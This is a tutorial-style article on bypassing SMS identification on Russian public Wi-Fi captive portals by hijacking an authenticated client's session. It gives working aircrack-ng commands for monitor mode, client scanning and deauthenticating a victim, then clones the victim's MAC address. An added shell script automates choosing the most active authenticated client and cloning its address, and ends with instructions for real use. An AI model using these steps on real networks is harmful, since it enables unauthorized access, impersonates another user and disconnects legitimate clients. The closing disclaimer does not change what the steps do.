How to bypass SMS identification when connecting to public Wi-Fi networks?
In 2014, Government of the Russian Federation Decrees No. 758 and No. 801 obliged owners of public Wi-Fi networks to configure their routers so that users are identified by passport data, by SMS, or through the state services portal (Gosuslugi). Cafe owners' reluctance to pay for a captive portal led some providers to distribute their own access points with paid SMS authorization. I wanted to check whether such SMS authorization can be bypassed.
sudo -s  # work with root privileges
ifconfig  # find the name of the adapter we want to use
We get the output:
wlx60e32719503f: flags=4099
ether 2a:36:62:d5:ec:63 txqueuelen 1000 (Ethernet)
RX packets 0 bytes 0 (0.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 0 bytes 0 (0.0 B)
wlx60e32719503f is our adapter.
Kill the processes that use the adapter and put it into monitor mode:
airmon-ng check kill
airmon-ng start wlx60e32719503f
A new network interface, wlan0mon, appears. Start airodump-ng on it to scan for networks.
After a couple of minutes airodump-ng shows a table of access points and their clients.
We are interested in the BSSID (access point MAC address), CH (channel) and ESSID (network name) columns. In the ESSID column I found the network of interest (sixth in the list). We take the access point's MAC address (CC:B2:**:**:**:FC) and its channel (4) from the table and pass them to airodump-ng:
airodump-ng wlan0mon -c 4 --bssid CC:B2:**:**:**:FC
After some time we get the following output:
The first table has only one row: the network we are attacking. The second table lists the clients of this network. We are interested in the STATION column, which holds the client MAC addresses; save them to a text file. We need to replace our MAC address with one of them. I chose the MAC of the penultimate client (1C:CD:**:**:**:43), since it is the most active client on the network and therefore has certainly passed identification.
As everyone knows (I hope), two devices with the same MAC address do not get along well on the same network. So we have two options.
You can use the aireplay-ng utility to deauthenticate the client from the access point:
aireplay-ng -0 <count> -a CC:B2:**:**:**:FC -c 1C:CD:**:**:**:43 wlan0mon
"-a CC:B2:**:**:**:FC" is the attacked access point
"-c 1C:CD:**:**:**:43" is the client we will disconnect
"-0 <count>" selects the attack type (0 is deauthentication) and the number of deauthentication packets to send; a count of 0 keeps sending them, so the client is knocked off again if it reconnects. Note that clients and access points that negotiate Protected Management Frames (802.11w) ignore forged deauthentication frames, so this does not work everywhere.
But I decided not to harm anyone and to take the more humane route: wait until the client leaves on his own (it was time to eat pizza).
Fortunately, this client left quickly. Now we assign his MAC address to our own adapter. There are many ways to change a MAC address on Linux; the easiest is to enter the desired MAC address directly in the network connection settings. Remember that the adapter must be back in managed mode for this (airmon-ng stop wlan0mon), since you connect with the managed interface, not the monitor one.
The MAC address is set; now we can connect to the access point and check Internet access with the ping command.
I tried opening Google and several other sites: all successful.
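To make the client-selection and MAC-cloning steps above reproducible from the command line, here is an added shell example; it is not code from the original article. It assumes airodump-ng was also run with "-w scan --output-format csv" (a real option) so that the client table is available as scan-01.csv, picks the associated station with the most packets (the one most likely to have passed the portal), and prints or runs the ip link commands that clone its address. The CSV contents, the ESSIDs and every MAC address and timestamp in it are constructed for the example.

```shell
#!/bin/sh
# Added example (not from the original article): pick the most active
# client of the target access point out of an airodump-ng CSV dump and
# emit the `ip link` commands that clone its MAC address onto our adapter.
# All MAC addresses, ESSIDs and timestamps below are made up.

# Constructed sample in the layout airodump-ng writes with
#   airodump-ng wlan0mon -c 4 --bssid <AP> -w scan --output-format csv
# (file scan-01.csv): an access-point section, a blank line, then a
# station section. Fields are separated by a comma plus padding spaces.
SAMPLE_CSV='BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
CC:B2:11:22:33:FC, 2018-05-12 14:00:01, 2018-05-12 14:21:40,  4,  54, OPN,  ,  , -48,   812,   0,   0.  0.  0.  0,   9, Free_WiFi, 
AA:AA:AA:AA:AA:01, 2018-05-12 14:00:05, 2018-05-12 14:21:38,  6,  54, WPA2, CCMP, PSK, -70,   400,   0,   0.  0.  0.  0,   7, Pizza-5, 

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
D4:3D:00:00:00:0A, 2018-05-12 14:03:10, 2018-05-12 14:21:30, -55,      120, CC:B2:11:22:33:FC, 
1C:CD:00:00:00:43, 2018-05-12 14:01:02, 2018-05-12 14:21:39, -60,     1534, CC:B2:11:22:33:FC, 
00:11:22:33:44:55, 2018-05-12 14:02:00, 2018-05-12 14:20:00, -72,       35, (not associated), Free_WiFi
F0:F0:00:00:00:7B, 2018-05-12 14:05:00, 2018-05-12 14:21:10, -61,     2200, AA:AA:AA:AA:AA:01, 
'

# pick_station BSSID < scan-01.csv
# Prints "<station MAC> <packets>" for the associated client that has sent
# the most frames through BSSID (the one most likely to have passed the
# captive portal already); prints nothing if no client is associated.
pick_station() {
    awk -v bssid="$1" -F',' '
        BEGIN { best = -1 }
        /^Station MAC/ { in_stations = 1; next }   # header of the client table
        !in_stations || NF < 6 { next }            # AP section, blank lines
        {
            gsub(/^ +| +$/, "", $1)   # station MAC
            gsub(/^ +| +$/, "", $5)   # "# packets"
            gsub(/^ +| +$/, "", $6)   # BSSID the station is associated with
            if (toupper($6) == toupper(bssid) && $5 + 0 > best) {
                best = $5 + 0; mac = $1
            }
        }
        END { if (mac != "") print mac, best }
    '
}

# valid_mac MAC: six hex octets and unicast (bit 0 of the first octet
# clear). A multicast address can never be a client MAC, so refuse it
# before touching the interface.
valid_mac() {
    printf '%s' "$1" | grep -Eqi '^([0-9a-f]{2}:){5}[0-9a-f]{2}$' || return 1
    case "$(printf '%s' "$1" | cut -c2 | tr 'a-f' 'A-F')" in
        0|2|4|6|8|A|C|E) return 0 ;;
        *) return 1 ;;
    esac
}

# run CMD...: execute, or only print the command when DRY_RUN=1 (no root).
run() {
    if [ "${DRY_RUN:-0}" = 1 ]; then printf '%s\n' "$*"; else "$@"; fi
}

# clone_mac IFACE MAC: command-line equivalent of typing the MAC into the
# connection settings. The link must be down to change its address, and
# IFACE is the managed interface you will connect with, not wlan0mon.
clone_mac() {
    valid_mac "$2" || { echo "refusing to use invalid MAC: $2" >&2; return 1; }
    run ip link set dev "$1" down
    run ip link set dev "$1" address "$2"
    run ip link set dev "$1" up
}

# Demo on the constructed dump: choose the client, then show the commands.
station=$(printf '%s' "$SAMPLE_CSV" | pick_station CC:B2:11:22:33:FC | cut -d' ' -f1)
echo "most active client of CC:B2:11:22:33:FC: $station"
DRY_RUN=1
clone_mac wlx60e32719503f "$station"
```

In real use, feed the script scan-01.csv instead of SAMPLE_CSV and run clone_mac as root without DRY_RUN; the station with the highest packet count is chosen because a client that has been exchanging traffic for a while has necessarily completed the portal's SMS step, while a station marked "(not associated)" is only probing and is skipped.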
Thus we have established that SMS authorization is easily bypassed by replacing your MAC address with that of a client who has already been identified: the portal ties the authorized session to nothing but the client's MAC address, and on an open network nothing stops another device from cloning it. In conclusion, I want to repeat: "This article was written for informational purposes; the author in no way encourages readers to violate the laws of the Russian Federation."